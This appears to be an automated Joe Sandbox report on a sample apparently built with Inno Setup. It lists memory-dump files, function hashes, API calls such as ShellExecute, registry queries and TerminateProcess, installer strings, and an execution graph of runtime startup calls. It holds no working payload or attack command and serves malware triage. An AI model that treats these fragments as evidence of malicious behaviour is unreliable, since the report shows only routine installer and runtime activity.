                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ActiveForeground
                                                                            • String ID: Will not restart Windows automatically.
                                                                            • API String ID: 307657957-4169339592
                                                                            • Opcode ID: f35973b3444d63abd30155c0fb60d5d87605f2a8390df662fe53ad2e28820558
                                                                            • Instruction ID: df9a9ae9a8219d8b6a1298420550b74bcee7fa449f44545fa147fc9774bd32fa
                                                                            • Opcode Fuzzy Hash: f35973b3444d63abd30155c0fb60d5d87605f2a8390df662fe53ad2e28820558
                                                                            • Instruction Fuzzy Hash: A7413330208340AED710FFA4DC9AB6E3BA4DB15F05F1408B7E9404B3A2D6BD5A04DB1D
                                                                            APIs
                                                                            • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,004021FC), ref: 004020CB
                                                                              • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,02185EE8,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                              • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,02185EE8,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                              • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,02185EE8,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                              • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,02185EE8,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection$Enter$AllocInitializeLeaveLocal
                                                                            • String ID: pI{
                                                                            • API String ID: 296031713-1306324410
                                                                            • Opcode ID: 4b9225ab6ba6685e005fd9bf0415e9852399b88a9652eb18fdb70e0530e56136
                                                                            • Instruction ID: 30adadd309813d1a6846ca6b4958dbaac508113c784b73a5bb8d11bfdb372a30
                                                                            • Opcode Fuzzy Hash: 4b9225ab6ba6685e005fd9bf0415e9852399b88a9652eb18fdb70e0530e56136
                                                                            • Instruction Fuzzy Hash: 3941E3B2E00304DFDB10CF69EE8521A77A4F7A8324B15417FD854A77E2D3789801DB88
                                                                            Strings
                                                                            • Failed to proceed to next wizard page; aborting., xrefs: 0046CFCC
                                                                            • Failed to proceed to next wizard page; showing wizard., xrefs: 0046CFE0
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Failed to proceed to next wizard page; aborting.$Failed to proceed to next wizard page; showing wizard.
                                                                            • API String ID: 0-1974262853
                                                                            • Opcode ID: f8b0d9f73654ae948dfe63457d27392de8d2a8ebea4116114edd3800fcdd02ea
                                                                            • Instruction ID: 63d40b18a6e87dbc706e62a2b7ed59e25ea13cd94e581da409b3f01416405f56
                                                                            • Opcode Fuzzy Hash: f8b0d9f73654ae948dfe63457d27392de8d2a8ebea4116114edd3800fcdd02ea
                                                                            • Instruction Fuzzy Hash: 9A319E30A08244DFD711EB99D989BA977F6EB05308F1500FBF0489B392D779AE40CB1A
                                                                            APIs
                                                                              • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                                            • RegCloseKey.ADVAPI32(?,00478E9A,?,?,00000001,00000000,00000000,00478EB5), ref: 00478E83
                                                                            Strings
                                                                            • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00478E0E
                                                                            • %s\%s_is1, xrefs: 00478E2C
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: CloseOpen
                                                                            • String ID: %s\%s_is1$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                            • API String ID: 47109696-1598650737
                                                                            • Opcode ID: 3c218534b7aea35313477da1420f505f75d4b79f6803eaf18b753309f41f968f
                                                                            • Instruction ID: 403b8390735a8e98fed73365c843d129082673b7d0193522817cb9849c55968d
                                                                            • Opcode Fuzzy Hash: 3c218534b7aea35313477da1420f505f75d4b79f6803eaf18b753309f41f968f
                                                                            • Instruction Fuzzy Hash: 79218470B40208AFDB01DFAACC55A9EBBE8EB48304F90847EE904E7381DB785D018A59
                                                                            APIs
                                                                            • SendMessageA.USER32(00000000,0000044B,00000000,?), ref: 004501E9
                                                                            • ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 0045021A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: ExecuteMessageSendShell
                                                                            • String ID: open
                                                                            • API String ID: 812272486-2758837156
                                                                            • Opcode ID: adeb5e276340ad6fa3d53176e38ffb5e58c1499704c489fbf40d86a9362c05b3
                                                                            • Instruction ID: 6e2feb9b457cb976a84d54f3b3258ed3b08e14d6ba220cef3ebd8abcd6e201e4
                                                                            • Opcode Fuzzy Hash: adeb5e276340ad6fa3d53176e38ffb5e58c1499704c489fbf40d86a9362c05b3
                                                                            • Instruction Fuzzy Hash: 62219474E40208AFDB00DFA5C886B9EB7F8EB44705F2081BAB514E7282D7789E05CB58
                                                                            APIs
                                                                            • ShellExecuteEx.SHELL32(0000003C), ref: 00455318
                                                                            • GetLastError.KERNEL32(0000003C,00000000,00455361,?,?,00000001,00000001), ref: 00455329
                                                                              • Part of subcall function 0042D8D4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8E7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: DirectoryErrorExecuteLastShellSystem
                                                                            • String ID: <
                                                                            • API String ID: 893404051-4251816714
                                                                            • Opcode ID: 57012810d142c3df1a5160bec437aa7c33a0c7c828d826884eb3f35a8728d1b1
                                                                            • Instruction ID: ea799879bbb6ab716a70283d096866571a468ac1fa4b8cc73728b10af3e72d10
                                                                            • Opcode Fuzzy Hash: 57012810d142c3df1a5160bec437aa7c33a0c7c828d826884eb3f35a8728d1b1
                                                                            • Instruction Fuzzy Hash: 02215370A00609ABDB10DFA5D8926AE7BF8AF18355F50443AFC44E7281D7789949CB58
                                                                            APIs
                                                                            • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,)), ref: 004025C7
                                                                            • RtlLeaveCriticalSection.KERNEL32(0049B420,0040263D), ref: 00402630
                                                                              • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,02185EE8,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                              • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,02185EE8,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                              • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,02185EE8,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                              • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,02185EE8,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                            • String ID: )
                                                                            • API String ID: 2227675388-1084416617
                                                                            • Opcode ID: 09cf32ac568926239da630a480ec85c7fe0e44c3c7351229851fbcf18ccaddb2
                                                                            • Instruction ID: 77bd95ba853a3ee3b707a504883d316aad751082ca23ba06a0d8aa2ba3da16af
                                                                            • Opcode Fuzzy Hash: 09cf32ac568926239da630a480ec85c7fe0e44c3c7351229851fbcf18ccaddb2
                                                                            • Instruction Fuzzy Hash: E11104317042046FEB15AB796F5962B6AD4D795758B24087FF404F33D2DABD8C02929C
                                                                            APIs
                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 00496539
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: Window
                                                                            • String ID: /INITPROCWND=$%x $@
                                                                            • API String ID: 2353593579-4169826103
                                                                            • Opcode ID: 552611a81f91654fc44d41bb0f0c519a98a2c07263e337a61ce07e3eab6c417a
                                                                            • Instruction ID: 8ac61a852f64af84e8a4d996ffe215da0ea6a1f7c0dd4c2642a2787a2d41e8fe
                                                                            • Opcode Fuzzy Hash: 552611a81f91654fc44d41bb0f0c519a98a2c07263e337a61ce07e3eab6c417a
                                                                            • Instruction Fuzzy Hash: C711A531A043089FDB01DF64E855BAE7BE8EB48324F52847BE404E7281DB3CE905CA58
                                                                            APIs
                                                                              • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                              • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                            • SysFreeString.OLEAUT32(?), ref: 004474D6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: String$AllocByteCharFreeMultiWide
                                                                            • String ID: NIL Interface Exception$Unknown Method
                                                                            • API String ID: 3952431833-1023667238
                                                                            • Opcode ID: 258d3c6477c64922ebec54d5f4264d59c03dbf12c3c57b46792931bb3fd1eaaf
                                                                            • Instruction ID: aafd2560cbf8ba646f5ae6954b41d26adab4393ec7197c17a1bba45f9511721b
                                                                            • Opcode Fuzzy Hash: 258d3c6477c64922ebec54d5f4264d59c03dbf12c3c57b46792931bb3fd1eaaf
                                                                            • Instruction Fuzzy Hash: 0811D6306042049FEB10DFA59D42A6EBBACEB49704F91403AF504E7681C7789D01CB69
                                                                            APIs
                                                                            • RegQueryValueExA.ADVAPI32(?,Inno Setup: No Icons,00000000,00000000,00000000,00000000), ref: 0042DD88
                                                                            • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,Inno Setup: No Icons,00000000,00000000,00000000), ref: 0042DDC8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: Value$EnumQuery
                                                                            • String ID: Inno Setup: No Icons
                                                                            • API String ID: 1576479698-2016326496
                                                                            • Opcode ID: e0e38617d7780f69d75f26860b1501b2527d54a68fe4bf3310a8a6dfd5a7631c
                                                                            • Instruction ID: 05ef73584c9e0c756a5fead926ccd29af3c260b6948a855c27afe474e1c18ecb
                                                                            • Opcode Fuzzy Hash: e0e38617d7780f69d75f26860b1501b2527d54a68fe4bf3310a8a6dfd5a7631c
                                                                            • Instruction Fuzzy Hash: B2012B36F5A77179F73046256D02BBB56888B82B60F68453BF940EA2C0D6589C04C36E
                                                                            APIs
                                                                              • Part of subcall function 004555D0: GetCurrentProcess.KERNEL32(00000028), ref: 004555DF
                                                                              • Part of subcall function 004555D0: OpenProcessToken.ADVAPI32(00000000,00000028), ref: 004555E5
                                                                            • SetForegroundWindow.USER32(?), ref: 00497266
                                                                            Strings
                                                                            • Restarting Windows., xrefs: 00497243
                                                                            • Not restarting Windows because Uninstall is being run from the debugger., xrefs: 00497291
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: Process$CurrentForegroundOpenTokenWindow
                                                                            • String ID: Not restarting Windows because Uninstall is being run from the debugger.$Restarting Windows.
                                                                            • API String ID: 3179053593-4147564754
                                                                            • Opcode ID: 699fd1f27132e499a72d678966239612eac8b61dfe9d57f4c88cf0c32b356d0f
                                                                            • Instruction ID: f042dff5c045186d33be5417afa4f05d679b9763972d2bb00463d131ea403ed4
                                                                            • Opcode Fuzzy Hash: 699fd1f27132e499a72d678966239612eac8b61dfe9d57f4c88cf0c32b356d0f
                                                                            • Instruction Fuzzy Hash: FD01D8706282406BEB00EB65E981B9C3F99AB5430CF5040BBF900A72D3D73C9945871D
                                                                            APIs
                                                                              • Part of subcall function 0047CD84: FreeLibrary.KERNEL32(74DF0000,004814B7), ref: 0047CD9A
                                                                              • Part of subcall function 0047CA54: GetTickCount.KERNEL32 ref: 0047CA9E
                                                                              • Part of subcall function 004570CC: SendMessageA.USER32(00000000,00000B01,00000000,00000000), ref: 004570EB
                                                                            • GetCurrentProcess.KERNEL32(00000001,?,?,?,?,0049832B), ref: 00497A29
                                                                            • TerminateProcess.KERNEL32(00000000,00000001,?,?,?,?,0049832B), ref: 00497A2F
                                                                            Strings
                                                                            • Detected restart. Removing temporary directory., xrefs: 004979E3
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: Process$CountCurrentFreeLibraryMessageSendTerminateTick
                                                                            • String ID: Detected restart. Removing temporary directory.
                                                                            • API String ID: 1717587489-3199836293
                                                                            • Opcode ID: e611eeaa9fed28cadb8c69ef2edffd8a52967f1f4ce985551ff58b7f7fd4f302
                                                                            • Instruction ID: 93f06bea8fcfa1b224d7ac257058da4e76460d04d1e35911cc499d3d1c0dfa98
                                                                            • Opcode Fuzzy Hash: e611eeaa9fed28cadb8c69ef2edffd8a52967f1f4ce985551ff58b7f7fd4f302
                                                                            • Instruction Fuzzy Hash: 51E0553120C3002EDA02B7B2BC52A2F7F8CD701728311083BF40882452C43D1810C77D
                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(00000000,00498586), ref: 0040334B
                                                                            • GetCommandLineA.KERNEL32(00000000,00498586), ref: 00403356
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: CommandHandleLineModule
                                                                            • String ID: 07y
                                                                            • API String ID: 2123368496-1660179758
                                                                            • Opcode ID: 48b45b62bccbc2a8e5daf731e4078a894a727d510552ebcfe8024faf6b9ab272
                                                                            • Instruction ID: ff8fa06d391bd0b31f892a344b3e95d40f530220570fde7b1ba7fad45aeb04f1
                                                                            • Opcode Fuzzy Hash: 48b45b62bccbc2a8e5daf731e4078a894a727d510552ebcfe8024faf6b9ab272
                                                                            • Instruction Fuzzy Hash: 45C002609013058AD754AF7579467162A94D751349F80447FF114BA3E1D77C82055BDD
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLastSleep
                                                                            • String ID:
                                                                            • API String ID: 1458359878-0
                                                                            • Opcode ID: 11e49af8eca5aab8e77903997d46822470632a6293514e89f51700c73713890d
                                                                            • Instruction ID: a2606c7dd4c17da0a3c90c20a229de96912268129783a4208f21052e6a4fbdd3
                                                                            • Opcode Fuzzy Hash: 11e49af8eca5aab8e77903997d46822470632a6293514e89f51700c73713890d
                                                                            • Instruction Fuzzy Hash: 62F02436B01D64578F20A59E998193F63DDEA94376750013BFC0CDB303D438CC098AA9

                                                                            Execution Graph

                                                                            Execution Coverage:9.9%
                                                                            Dynamic/Decrypted Code Coverage:83.7%
                                                                            Signature Coverage:3.2%
                                                                            Total number of Nodes:2000
                                                                            Total number of Limit Nodes:42
                                                                            execution_graph 18194 40b181 CopyFileA 18195 40278e 18194->18195 18196 402142 18197 4022f3 18196->18197 18201 2e33c52 18197->18201 18202 2e33c60 18201->18202 18203 2e33c5b 18201->18203 18207 2e33c75 18202->18207 18215 2e3b821 18203->18215 18206 40b5fb Sleep 18208 2e33c81 ___BuildCatchObject 18207->18208 18211 2e33ccf ___DllMainCRTStartup 18208->18211 18212 2e33d2c ___BuildCatchObject 18208->18212 18219 2e33ae0 18208->18219 18210 2e33d09 18210->18212 18213 2e33ae0 __CRT_INIT@12 138 API calls 18210->18213 18211->18210 18211->18212 18214 2e33ae0 __CRT_INIT@12 138 API calls 18211->18214 18212->18206 18213->18212 18214->18210 18216 2e3b851 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 18215->18216 18217 2e3b844 18215->18217 18218 2e3b848 18216->18218 18217->18216 18217->18218 18218->18202 18220 2e33aec ___BuildCatchObject 18219->18220 18221 2e33af4 18220->18221 18222 2e33b6e 18220->18222 18267 2e38126 GetProcessHeap 18221->18267 18224 2e33b72 18222->18224 18225 2e33bd7 18222->18225 18229 2e33b93 18224->18229 18238 2e33afd ___BuildCatchObject __CRT_INIT@12 18224->18238 18368 2e3839b 18224->18368 18227 2e33c3a 18225->18227 18228 2e33bdc 18225->18228 18226 2e33af9 18226->18238 18268 2e35cd4 18226->18268 18227->18238 18427 2e35b64 18227->18427 18399 2e3910b 18228->18399 18371 2e38272 RtlDecodePointer 18229->18371 18234 2e33be7 18234->18238 18402 2e389ac 18234->18402 18236 2e33b09 __RTC_Initialize 18236->18238 18245 2e33b19 GetCommandLineA 18236->18245 18238->18211 18240 2e33ba9 __CRT_INIT@12 18395 2e33bc2 18240->18395 18241 2e3b4bf __ioterm 60 API calls 18244 2e33ba4 18241->18244 18247 2e35d4a __mtterm 62 API calls 18244->18247 18289 2e3b8bd GetEnvironmentStringsW 18245->18289 18247->18240 18249 2e33c10 18251 2e33c16 18249->18251 18252 2e33c2e 18249->18252 18411 2e35c21 18251->18411 18421 2e32eb4 18252->18421 18256 2e33b33 18264 2e33b37 18256->18264 18321 2e3b511 18256->18321 18257 2e33c1e GetCurrentThreadId 18257->18238 18261 2e33b57 18261->18238 18363 2e3b4bf 18261->18363 18354 2e35d4a 18264->18354 18267->18226 18435 2e38442 RtlEncodePointer 18268->18435 18270 2e35cd9 18440 2e3895e 18270->18440 18273 2e35ce2 18274 2e35d4a __mtterm 62 API calls 18273->18274 18276 2e35ce7 18274->18276 18276->18236 18278 2e35cff 18279 2e389ac __calloc_crt 59 API calls 18278->18279 18280 2e35d0c 18279->18280 18281 2e35d41 18280->18281 18283 2e3912a __threadstartex@4 TlsSetValue 18280->18283 18282 2e35d4a __mtterm 62 API calls 18281->18282 18284 2e35d46 18282->18284 18285 2e35d20 18283->18285 18284->18236 18285->18281 18286 2e35d26 18285->18286 18287 2e35c21 __initptd 59 API calls 18286->18287 18288 2e35d2e GetCurrentThreadId 18287->18288 18288->18236 18290 2e3b8d0 WideCharToMultiByte 18289->18290 18291 2e33b29 18289->18291 18293 2e3b903 18290->18293 18294 2e3b93a FreeEnvironmentStringsW 18290->18294 18302 2e3b20b 18291->18302 18451 2e389f4 18293->18451 18294->18291 18297 2e3b910 WideCharToMultiByte 18298 2e3b926 18297->18298 18299 2e3b92f FreeEnvironmentStringsW 18297->18299 18300 2e32eb4 _free 59 API calls 18298->18300 18299->18291 